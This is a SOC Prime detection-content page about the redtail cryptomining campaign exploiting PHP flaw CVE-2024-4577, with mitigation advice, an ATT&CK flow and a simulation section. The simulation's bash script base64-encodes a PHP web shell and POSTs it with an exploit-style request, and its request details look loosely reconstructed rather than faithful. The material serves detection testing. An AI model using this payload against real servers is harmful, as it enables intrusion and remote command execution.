SOC Prime Bias: Critical

30 Apr 2026 17:12
newspaper icon SANS Internet Storm Center

Libredtail Exploits CVE-2024-4577 for Cryptomining

Author Photo
SOC Prime Team linkedin icon Follow
Libredtail Exploits CVE-2024-4577 for Cryptomining
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The article details a cryptomining campaign involving the redtail malware family, which is delivered through HTTP requests that exploit CVE-2024-4577 in PHP. Threat actors send Base64-encoded payloads that retrieve and run a self-replicating script named cve_2024_4577.selfrep. The activity is aimed at vulnerable web servers and is paired with follow-on SSH login attempts that rely on default credentials to expand access.

Investigation

The researcher observed several IP addresses from Germany, the United Kingdom, and India sending a sequence of four HTTP POST requests designed to traverse to /bin/sh, use wget or curl to download a shell script, and trigger the CVE-2024-4577 exploit. When successful, the attack drops a hidden .redtail binary and terminates competing cryptomining services already running on the host. The investigation also recorded SSH login attempts using credentials such as admin/admin, along with SYN scanning activity.

Mitigation

Organizations should update PHP installations to versions that address CVE-2024-4577, block the libredtail-http user agent at the perimeter, and deploy WAF rules that deny requests containing /sh or the known exploit payload pattern. SSH access should be hardened by enforcing key-based authentication and disabling default or weak credentials. Monitoring for suspicious outbound traffic to unknown IP addresses is also recommended.

Response

When detections are triggered, defenders should isolate the affected system, collect forensic artifacts such as the cve_2024_4577.selfrep script and the .redtail binary, and remove any cron jobs or scheduled tasks created by the malware. Security teams should then inventory PHP applications across the environment and apply the necessary patches. SSH logs should also be reviewed for signs of credential abuse or unauthorized access.

"graph TB %% Class definitions classDef technique fill:#99ccff %% Nodes u2013 MITRE ATT&CK Techniques tech_exploit_app["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Adversaries may exploit a publicu2011facing application to gain initial access."] class tech_exploit_app technique tech_content_injection["<b>Technique</b> – <b>T1659 Content Injection</b><br/><b>Description</b>: Adversary injects malicious content such as a PHP payload into a web application to achieve code execution."] class tech_content_injection technique tech_deobfuscate["<b>Technique</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: Adversaries decode or deobfuscate data (e.g., Base64) to reveal commands or payloads."] class tech_deobfuscate technique tech_unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: Adversaries use a Unix shell to execute commands such as wget, curl, or sh for downloading and running malicious code."] class tech_unix_shell technique tech_hidden_file["<b>Technique</b> – <b>T1564.001 Hidden Files and Directories</b><br/><b>Description</b>: Adversaries create hidden files or directories (e.g., .redtail) to conceal malicious artifacts."] class tech_hidden_file technique tech_compute_hijack["<b>Technique</b> – <b>T1496.001 Compute Hijacking</b><br/><b>Description</b>: Adversaries hijack system compute resources to perform unauthorized cryptomining."] class tech_compute_hijack technique tech_brute_force["<b>Technique</b> – <b>T1110.001 Password Guessing</b><br/><b>Description</b>: Adversaries attempt credential guessing (e.g., SSH admin/admin) to obtain valid credentials."] class tech_brute_force technique tech_network_discovery["<b>Technique</b> – <b>T1046 Network Service Discovery</b><br/><b>Description</b>: Adversaries perform scans (e.g., SYN scans) to discover active network services and open ports."] class tech_network_discovery technique tech_obfuscate["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Adversaries encode or otherwise obfuscate files (e.g., Base64 encoded POST body) to evade detection."] class tech_obfuscate technique %% Connections showing attack flow tech_exploit_app –>|leads_to| tech_content_injection tech_content_injection –>|leads_to| tech_deobfuscate tech_deobfuscate –>|leads_to| tech_unix_shell tech_unix_shell –>|leads_to| tech_hidden_file tech_hidden_file –>|leads_to| tech_compute_hijack tech_exploit_app –>|also_triggers| tech_brute_force tech_brute_force –>|leads_to| tech_network_discovery tech_unix_shell –>|enables| tech_obfuscate "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on a compromised web server and wishes to establish persistence using the Libredtail‑HTTP web‑shell. They craft a malicious HTTP POST that:

    1. Uses the distinctive libredtail‑http user‑agent (helps the malware identify its own traffic).
    2. Includes a URL query with /bin/sh to indicate a command‑execution request and the PHP directive allow_url_include=1 to permit remote code inclusion.
    3. Sends a base64‑encoded payload in the request body that contains the PHP code <?php system($_GET['cmd']); ?> (obfuscation – T1027).
    4. Sets a custom header Script-Execution: apache.selfrep which Libredtail‑HTTP uses internally for self‑replication (matches script_execution|contains).

    The server, when processing this request, decodes the payload, writes a malicious PHP file to the webroot, and later executes commands received via /bin/sh, establishing an encrypted channel back to the attacker (T1573).

  • Regression Test Script:

    #!/usr/bin/env bash
# -------------------------------------------------
# Libredtail-HTTP malicious request simulation
# -------------------------------------------------
TARGET="http://localhost/upload.php"
USER_AGENT="libredtail-http"
MALICIOUS_PAYLOAD=$(echo -n '<?php system($_GET["cmd"]); ?>' | base64)

curl -X POST "$TARGET?dir=/bin/sh&allow_url_include=1" 
     -H "User-Agent: $USER_AGENT" 
     -H "Script-Execution: apache.selfrep" 
     -H "Content-Type: application/x-www-form-urlencoded" 
     --data "payload=$MALICIOUS_PAYLOAD&marker=cve_2024_4577.selfrep"
# The request should create/overwrite a PHP web‑shell on the server.

    Run the script on a machine that can reach the target web server. After execution, verify the alert fires in the SIEM.

  • Cleanup Commands:

    #!/usr/bin/env bash
# Remove the malicious PHP web‑shell created by the test
CLEANUP_TARGET="http://localhost/cleanup.php"

curl -X POST "$CLEANUP_TARGET" 
     -H "User-Agent: libredtail-http" 
     -d "file=uploaded_shell.php"

    The cleanup endpoint is assumed to exist for test purposes; replace with appropriate file‑system removal commands if you have direct host access.

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free